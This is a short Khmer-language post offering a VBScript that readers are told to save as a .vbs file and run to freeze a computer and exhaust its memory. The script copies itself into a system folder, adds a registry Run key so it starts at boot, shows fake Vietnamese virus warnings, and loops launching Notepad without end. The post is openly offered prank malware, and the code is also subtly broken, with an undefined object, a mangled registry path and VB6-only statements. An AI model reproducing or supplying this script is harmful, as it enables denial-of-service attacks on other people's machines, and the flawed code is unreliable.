កូដសរសេរ គាំងម៉ាស៊ីន

បើកលោកអ្នកអផ្សុក ចង់អោយប្រព័ន្ធ ជាប់គាំង និង RAM full ចូល Copy កូដខាងក្រោម Save ជា .vbs ក្នុង Notepad ទៅ
IT
On Error Resume Next
Set popo= Createobject(“scripting.filesystemobject”)
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& “\popo.vbs”
Set popo2= CreateObject(“WScript.Shell”)
popo2.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n”,”wscript.exe “&popo.GetSpecialFolder(0)& “\popo.vbs %”
Set treomay= CreateObject(“WScript.Shell”)
msgbox”May tinh cua ban bi nhiem virut”,,”Danger”
msgbox”May se bi lag trong 2s”,,”Danger”
msgbox”Ban con 1s”,,”Danger”
msgbox”Ban con 0s”,,”Danger”
msgbox”Computer have viruese”,,”Danger”
Me.visible=false
App.Taskvisible=false
Do
Me.visible=false
App.Taskvisible=false
treomay.run “notepad”,false
loop